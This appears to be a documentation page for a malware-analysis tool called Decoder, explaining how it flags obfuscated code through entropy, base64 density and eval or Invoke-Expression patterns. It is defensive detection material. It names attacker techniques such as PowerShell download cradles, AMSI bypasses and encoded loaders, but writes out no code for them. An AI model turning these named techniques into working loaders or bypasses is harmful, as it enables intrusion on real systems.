Obfuscation Detection — Spotting hidden code
Obfuscation hides intent. Decoder flags suspicious entropy, base64 walls, eval chains, and packing markers so reviewers can focus on what's actually hidden.
What it is
Set of heuristics that score how unreadable / non-natural a chunk of code is.
Why it's useful
Most malicious payloads are obfuscated before delivery — detecting that is half the job.
How Decoder implements it
Combines entropy windows, base64 / hex density, eval/exec/Invoke-Expression patterns, and AI explanation for context.
When to use it
Any script or binary from an untrusted source.
When NOT to use it
Minified production bundles — expect false positives; pair with AI explain.
Practical example
A PowerShell loader with 0.92 entropy and Invoke-Expression on a base64 blob trips multiple rules at once.
FAQ
Glossary
- Packing
- Compressing/encrypting an executable to hide its real code until runtime.
- Base64 wall
- Large base64 blob embedded inline — common loader pattern.
Related
Entropy is a statistical measure of how 'random' the bytes in a file look. In malware analysis, abnormally high entropy is a strong signal that a section is packed, encrypted or otherwise obfuscated.
PowerShell is the workhorse of Windows post-exploitation. Decoder reads `.ps1` files statically and surfaces the patterns attackers rely on: encoded commands, `Invoke-Expression`, download cradles, AMSI bypasses.
YARA is a rule language used by malware analysts to describe families and behaviours. Decoder applies YARA-style heuristics during malware scans.
AI-Origin Detection estimates whether a code artefact was likely produced by an LLM, and explains why. The goal is informed review, not gatekeeping.
LockBit 3.0 leaked source provided a real-world benchmark. This entry walks through what Decoder flags and why — useful as a reference for ransomware patterns.
JavaScript and TypeScript are first-class in Decoder. Upload single files, ZIPs, or import a GitHub repo.